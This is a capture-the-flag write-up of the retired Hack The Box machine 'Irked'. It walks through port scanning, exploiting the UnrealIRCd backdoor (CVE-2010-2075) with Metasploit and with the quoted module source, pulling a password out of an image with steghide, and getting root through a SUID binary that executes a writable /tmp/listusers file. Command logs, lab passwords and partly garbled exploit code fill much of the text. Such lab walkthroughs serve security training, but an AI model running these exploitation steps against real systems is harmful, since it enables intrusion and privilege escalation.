HTB – Irked

Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of irked is


Let’s start off with our basic Nmap command to find out the open ports and services.

root@kali:~/htb# nmap -p- -sV --open
Starting Nmap 7.70 ( ) at 2019-09-04 05:49 EDT
Nmap scan report for
Host is up (0.027s latency).
Not shown: 65427 closed ports, 101 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
34772/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 26.89 seconds


I tried to extract hidden information with the help of steghide, but we need to find the passphrase for that.

root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase:


Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, it runs on 6697 here. I pwned the victim machine successfully after running the module.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts
rhosts =>
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost
lhost =>
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 
[*] - Connected to
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jt9flkHuSYLifEoc;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "jt9flkHuSYLifEoc\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2019-09-04 05:07:52 -0400

python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$ cd /home
cd /home
ircd@irked:/home$ ls
djmardov ircd
ircd@irked:/home$ cd djmardov/Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
root@kali:~/htb# curl
<img src=irked.jpg>
<b><center>IRC is almost working!</b></center>
root@kali:~/htb# curl -o irked.jpg
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 34697 100 34697 0 0 491k 0 --:--:-- --:--:-- --:--:-- 491k
root@kali:~/htb# steghide extract -sf irked.jpg
Enter passphrase: UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@kali:~/htb# cat pass.txt
I found another password from the inside pass.txt file “Kab6h+m+bbp2J: HG.”
Without Metasploit:

nmap also gave me the name of the irc server, UnrealIRCd. searchsploit shows there are exploits if the version is

root@kali:~/htb# searchsploit UnrealIRCd
---------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
UnrealIRCd - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd - Remote Downloader/Execute | exploits/linux/remote/
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/htb# searchsploit -m exploits/linux/remote/16922.rb
Exploit: UnrealIRCd - Backdoor Command Execution (Metasploit)
Path: /usr/share/exploitdb/exploits/linux/remote/16922.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /root/htb/16922.rb

root@kali:~/htb# cat 16922.rb 
# $Id: unreal_ircd_3281_backdoor.rb 11227 2010-12-05 15:08:22Z mc $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
			'Name'           => 'UnrealIRCD Backdoor Command Execution',
			'Description'    => %q{
					This module exploits a malicious backdoor that was added to the
				Unreal IRCD download archive. This backdoor was present in the
				Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11227 $',
			'References'     =>
					[ 'CVE', '2010-2075' ],
					[ 'OSVDB', '65445' ],
					[ 'URL', '' ]
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
			'Targets'        =>
					[ 'Automatic Target', { }]
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 12 2010'))

			], self.class)

	def exploit

		print_status("Connected to #{rhost}:#{rport}...")
		banner = sock.get_once(-1, 30)
		banner.to_s.split("\n").each do |line|
			print_line("    #{line}")

		print_status("Sending backdoor command...")
		sock.put("AB;" + payload.encoded + "\n")


It looks like the exploit is to connect and then send “AB;” + the payload + “\n”.

Privilege Escalation

First, I open the user.txt file and finish the first challenge. Now let’s penetrate more to find the root.txt file, and that’s why we need to increase the privilege, so I’m trying to find out if there’s any suid permission script.Here /usr/bin/viewuser looks more interesting, let’s check it out.

root@kali:~/htb# ssh djmardov@
djmardov@'s password: Kab6h+m+bbp2J:HG

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep  4 05:13:43 2019 from
djmardov@irked:~$ pwd
djmardov@irked:~$ cat Documents/user.txt 
djmardov@irked:/$ find / -perm -u=s -type f 2>/dev/null
djmardov@irked:/$ ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (
sh: 1: /tmp/listusers: not found
djmardov@irked:/$ echo '/bin/sh' > /tmp/listusers
djmardov@irked:/$ chmod 777 /tmp/listusers
djmardov@irked:/$ /usr/bin/viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-09-04 05:05 (:0)
djmardov pts/1 2019-09-04 05:13 (
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# cd /root
# ls
pass.txt root.txt
# cat root.txt

So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.

So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.

Now we have a root shell

Credits to

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published.